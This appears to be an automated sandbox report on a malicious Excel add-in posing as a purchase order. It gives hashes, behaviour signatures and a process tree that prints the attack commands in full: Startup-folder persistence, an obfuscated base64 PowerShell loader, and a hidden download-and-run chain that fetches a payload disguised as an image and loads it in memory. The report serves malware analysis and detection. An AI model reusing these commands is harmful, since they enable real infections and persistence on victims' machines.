1b18db45bd47fcb35d17c01d27f86a5f1adca9c54727555e297af3606c56da4d

Analysis

max time kernel
117s
max time network
121s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
25/08/2023, 08:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MQPurchase Order (2).xlam
Size

696KB
MD5

a1db675acf65b2c9c73deca075bea9b7
SHA1

bb92ae34c971ed37157824d233ab69ca5eda99e3
SHA256

1b18db45bd47fcb35d17c01d27f86a5f1adca9c54727555e297af3606c56da4d
SHA512

c2dd02d43f13686bb3e8d17387692c99d9b0d78d3cba7d21a0a5cc5077d0e4dd81116ad2f4e20301dc5b0e0c6fdbb545c49f08a39954523a910d996e9bc0bf00
SSDEEP

12288:MZ6lG+uV+WiUU7b+hjVbz1nyD0u1UaQyXA2tKTrGdntt7AXuyIEccU1zN8psZKST:plGzV+WiU1HbtyD0u1UYgr8tt7A+yIEw

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855

exe.dropper

https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	1724	EQNEDT32.EXE
6	2788	powershell.exe
8	2788	powershell.exe
10	2788	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ hx.vbs	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ hx.vbs	powershell.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1724	EQNEDT32.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3024	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2248	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2844	powershell.exe
2760	powershell.exe
2788	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2248	EXCEL.EXE
2248	EXCEL.EXE
2248	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1724 wrote to memory of 2228	1724	EQNEDT32.EXE	30
PID 1724 wrote to memory of 2228	1724	EQNEDT32.EXE	30
PID 1724 wrote to memory of 2228	1724	EQNEDT32.EXE	30
PID 1724 wrote to memory of 2228	1724	EQNEDT32.EXE	30
PID 2228 wrote to memory of 940	2228	WScript.exe	32
PID 2228 wrote to memory of 940	2228	WScript.exe	32
PID 2228 wrote to memory of 940	2228	WScript.exe	32
PID 2228 wrote to memory of 940	2228	WScript.exe	32
PID 940 wrote to memory of 3024	940	cmd.exe	34
PID 940 wrote to memory of 3024	940	cmd.exe	34
PID 940 wrote to memory of 3024	940	cmd.exe	34
PID 940 wrote to memory of 3024	940	cmd.exe	34
PID 940 wrote to memory of 2892	940	cmd.exe	35
PID 940 wrote to memory of 2892	940	cmd.exe	35
PID 940 wrote to memory of 2892	940	cmd.exe	35
PID 940 wrote to memory of 2892	940	cmd.exe	35
PID 2892 wrote to memory of 2844	2892	cmd.exe	36
PID 2892 wrote to memory of 2844	2892	cmd.exe	36
PID 2892 wrote to memory of 2844	2892	cmd.exe	36
PID 2892 wrote to memory of 2844	2892	cmd.exe	36
PID 2228 wrote to memory of 2760	2228	WScript.exe	37
PID 2228 wrote to memory of 2760	2228	WScript.exe	37
PID 2228 wrote to memory of 2760	2228	WScript.exe	37
PID 2228 wrote to memory of 2760	2228	WScript.exe	37
PID 2760 wrote to memory of 2788	2760	powershell.exe	39
PID 2760 wrote to memory of 2788	2760	powershell.exe	39
PID 2760 wrote to memory of 2788	2760	powershell.exe	39
PID 2760 wrote to memory of 2788	2760	powershell.exe	39

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\MQPurchase Order (2).xlam"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2248

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1724
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\hwweyhijk.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2228
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\hwweyhijk.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ hx.vbs')"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:940
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 5
      4⤵
      Runs ping.exe
      PID:3024
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\hwweyhijk.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ hx.vbs')"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2892
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\hwweyhijk.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ hx.vbs')
        5⤵
        Drops startup file
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2844
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DY⁂⇵Mw⁂⇵v⁂⇵DY⁂⇵Mg⁂⇵x⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵dQBu⁂⇵Gk⁂⇵dgBl⁂⇵HI⁂⇵cwBv⁂⇵F8⁂⇵dgBi⁂⇵HM⁂⇵LgBq⁂⇵H⁂⇵⁂⇵ZQBn⁂⇵D8⁂⇵MQ⁂⇵2⁂⇵Dk⁂⇵M⁂⇵⁂⇵5⁂⇵DM⁂⇵MQ⁂⇵4⁂⇵DU⁂⇵NQ⁂⇵n⁂⇵Ds⁂⇵J⁂⇵B3⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵BO⁂⇵GU⁂⇵dw⁂⇵t⁂⇵E8⁂⇵YgBq⁂⇵GU⁂⇵YwB0⁂⇵C⁂⇵⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBO⁂⇵GU⁂⇵d⁂⇵⁂⇵u⁂⇵Fc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵QgB5⁂⇵HQ⁂⇵ZQBz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵LgBE⁂⇵G8⁂⇵dwBu⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵R⁂⇵Bh⁂⇵HQ⁂⇵YQ⁂⇵o⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FU⁂⇵cgBs⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Fs⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵RQBu⁂⇵GM⁂⇵bwBk⁂⇵Gk⁂⇵bgBn⁂⇵F0⁂⇵Og⁂⇵6⁂⇵FU⁂⇵V⁂⇵BG⁂⇵Dg⁂⇵LgBH⁂⇵GU⁂⇵d⁂⇵BT⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵n⁂⇵Dw⁂⇵P⁂⇵BC⁂⇵EE⁂⇵UwBF⁂⇵DY⁂⇵N⁂⇵Bf⁂⇵FM⁂⇵V⁂⇵BB⁂⇵FI⁂⇵V⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵n⁂⇵Dw⁂⇵P⁂⇵BC⁂⇵EE⁂⇵UwBF⁂⇵DY⁂⇵N⁂⇵Bf⁂⇵EU⁂⇵TgBE⁂⇵D4⁂⇵Pg⁂⇵n⁂⇵Ds⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵BP⁂⇵GY⁂⇵K⁂⇵⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵C0⁂⇵ZwBl⁂⇵C⁂⇵⁂⇵M⁂⇵⁂⇵g⁂⇵C0⁂⇵YQBu⁂⇵GQ⁂⇵I⁂⇵⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵C0⁂⇵ZwB0⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵Kw⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵u⁂⇵Ew⁂⇵ZQBu⁂⇵Gc⁂⇵d⁂⇵Bo⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵C0⁂⇵I⁂⇵⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵Ow⁂⇵k⁂⇵GI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵EM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵FM⁂⇵dQBi⁂⇵HM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Cw⁂⇵I⁂⇵⁂⇵k⁂⇵GI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵Ew⁂⇵ZQBu⁂⇵Gc⁂⇵d⁂⇵Bo⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵QgB5⁂⇵HQ⁂⇵ZQBz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Fs⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBD⁂⇵G8⁂⇵bgB2⁂⇵GU⁂⇵cgB0⁂⇵F0⁂⇵Og⁂⇵6⁂⇵EY⁂⇵cgBv⁂⇵G0⁂⇵QgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵GI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵EM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Fs⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBS⁂⇵GU⁂⇵ZgBs⁂⇵GU⁂⇵YwB0⁂⇵Gk⁂⇵bwBu⁂⇵C4⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵F0⁂⇵Og⁂⇵6⁂⇵Ew⁂⇵bwBh⁂⇵GQ⁂⇵K⁂⇵⁂⇵k⁂⇵GM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵QgB5⁂⇵HQ⁂⇵ZQBz⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HQ⁂⇵eQBw⁂⇵GU⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bs⁂⇵G8⁂⇵YQBk⁂⇵GU⁂⇵Z⁂⇵BB⁂⇵HM⁂⇵cwBl⁂⇵G0⁂⇵YgBs⁂⇵Hk⁂⇵LgBH⁂⇵GU⁂⇵d⁂⇵BU⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵Cg⁂⇵JwBG⁂⇵Gk⁂⇵YgBl⁂⇵HI⁂⇵LgBI⁂⇵G8⁂⇵bQBl⁂⇵Cc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵bQBl⁂⇵HQ⁂⇵a⁂⇵Bv⁂⇵GQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵TQBl⁂⇵HQ⁂⇵a⁂⇵Bv⁂⇵GQ⁂⇵K⁂⇵⁂⇵n⁂⇵FY⁂⇵QQBJ⁂⇵Cc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵L⁂⇵⁂⇵o⁂⇵Cc⁂⇵d⁂⇵B4⁂⇵HQ⁂⇵LgBl⁂⇵GQ⁂⇵bg⁂⇵v⁂⇵Dg⁂⇵N⁂⇵⁂⇵y⁂⇵C4⁂⇵MQ⁂⇵1⁂⇵C4⁂⇵Ng⁂⇵3⁂⇵C4⁂⇵M⁂⇵⁂⇵4⁂⇵C8⁂⇵Lw⁂⇵6⁂⇵H⁂⇵⁂⇵d⁂⇵B0⁂⇵Gg⁂⇵Jw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bt⁂⇵GU⁂⇵d⁂⇵Bo⁂⇵G8⁂⇵Z⁂⇵⁂⇵u⁂⇵Ek⁂⇵bgB2⁂⇵G8⁂⇵awBl⁂⇵Cg⁂⇵J⁂⇵Bu⁂⇵HU⁂⇵b⁂⇵Bs⁂⇵Cw⁂⇵I⁂⇵⁂⇵k⁂⇵GE⁂⇵cgBn⁂⇵HU⁂⇵bQBl⁂⇵G4⁂⇵d⁂⇵Bz⁂⇵Ck⁂⇵';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.edn/842.15.67.08//:ptth');$method.Invoke($null, $arguments)"
      4⤵
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
87ae9e1707c6fb76dd08e88b72ea0bc1

SHA1
08e95b351ebc5b2dbffe3806cd9d3cd3ebadfb7a

SHA256
c9d45347bb41d98ee5403eabe9f9c4aa331faffd6eb32bf8ef2c450efd9886a7

SHA512
48d2da2f7c21d1fa060640f103f5ce722142de4d008a0aae6977ca7bdd182c0a3e1a3c6e1300aad4f9087ac58690e3f5daa4875565fe722002ba878df59b05e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabD886.tmp

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarDACE.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B8YBQUDUPK60FPHQ0HDU.temp

Filesize
7KB

MD5
9a8b6b904ed18f98c21ae54147321dbc

SHA1
fc1f50c8fa84623dc6d7dbbedb28205373107274

SHA256
0fa955576ab0e36e42de1ce4423b6567fdb58a8d5f04d66302331ca7ca545a06

SHA512
c590112e78d6cf419d5a6a8a630957b5fab5745c75fc51565132cefd58998f5db27dab8f1a1c9f09ac65967a2d3201c49ab14f341d46df7db1b3d264f50e49f2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9a8b6b904ed18f98c21ae54147321dbc

SHA1
fc1f50c8fa84623dc6d7dbbedb28205373107274

SHA256
0fa955576ab0e36e42de1ce4423b6567fdb58a8d5f04d66302331ca7ca545a06

SHA512
c590112e78d6cf419d5a6a8a630957b5fab5745c75fc51565132cefd58998f5db27dab8f1a1c9f09ac65967a2d3201c49ab14f341d46df7db1b3d264f50e49f2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9a8b6b904ed18f98c21ae54147321dbc

SHA1
fc1f50c8fa84623dc6d7dbbedb28205373107274

SHA256
0fa955576ab0e36e42de1ce4423b6567fdb58a8d5f04d66302331ca7ca545a06

SHA512
c590112e78d6cf419d5a6a8a630957b5fab5745c75fc51565132cefd58998f5db27dab8f1a1c9f09ac65967a2d3201c49ab14f341d46df7db1b3d264f50e49f2

Download Submit
C:\Users\Admin\AppData\Roaming\hwweyhijk.vbs

Filesize
300KB

MD5
35b3e5b2b511659424006f754f81695d

SHA1
c1fb7138cc68aa4651222fcd2f2d458ecf61c980

SHA256
5d0226e7aee258274d9ea003193a8695ba9219fa0b3d974a4cf4e75fe896d169

SHA512
976cba1c0ebe82f4779ab59c5efe99bce534e1f00b1e0e872e6c578509592abc141bf138f7e213e8495a6c27cfb00052bdd0fb5f40ef7baba70358a69dddf38f

Download Submit
C:\Users\Admin\AppData\Roaming\hwweyhijk.vbs

Filesize
300KB

MD5
35b3e5b2b511659424006f754f81695d

SHA1
c1fb7138cc68aa4651222fcd2f2d458ecf61c980

SHA256
5d0226e7aee258274d9ea003193a8695ba9219fa0b3d974a4cf4e75fe896d169

SHA512
976cba1c0ebe82f4779ab59c5efe99bce534e1f00b1e0e872e6c578509592abc141bf138f7e213e8495a6c27cfb00052bdd0fb5f40ef7baba70358a69dddf38f

Download Submit
memory/2248-102-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2248-103-0x000000007350D000-0x0000000073518000-memory.dmp

Filesize
44KB

Download
memory/2248-11-0x000000007350D000-0x0000000073518000-memory.dmp

Filesize
44KB

Download
memory/2248-1-0x000000007350D000-0x0000000073518000-memory.dmp

Filesize
44KB

Download
memory/2248-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2760-23-0x000000006BC10000-0x000000006C1BB000-memory.dmp

Filesize
5.7MB

Download
memory/2760-25-0x0000000002320000-0x0000000002360000-memory.dmp

Filesize
256KB

Download
memory/2760-24-0x000000006BC10000-0x000000006C1BB000-memory.dmp

Filesize
5.7MB

Download
memory/2760-100-0x000000006BC10000-0x000000006C1BB000-memory.dmp

Filesize
5.7MB

Download
memory/2788-31-0x000000006BC10000-0x000000006C1BB000-memory.dmp

Filesize
5.7MB

Download
memory/2788-32-0x000000006BC10000-0x000000006C1BB000-memory.dmp

Filesize
5.7MB

Download
memory/2788-99-0x000000006BC10000-0x000000006C1BB000-memory.dmp

Filesize
5.7MB

Download
memory/2844-17-0x000000006BAE0000-0x000000006C08B000-memory.dmp

Filesize
5.7MB

Download
memory/2844-15-0x00000000025E0000-0x0000000002620000-memory.dmp

Filesize
256KB

Download
memory/2844-14-0x00000000025E0000-0x0000000002620000-memory.dmp

Filesize
256KB

Download
memory/2844-13-0x000000006BAE0000-0x000000006C08B000-memory.dmp

Filesize
5.7MB

Download
memory/2844-12-0x000000006BAE0000-0x000000006C08B000-memory.dmp

Filesize
5.7MB

Download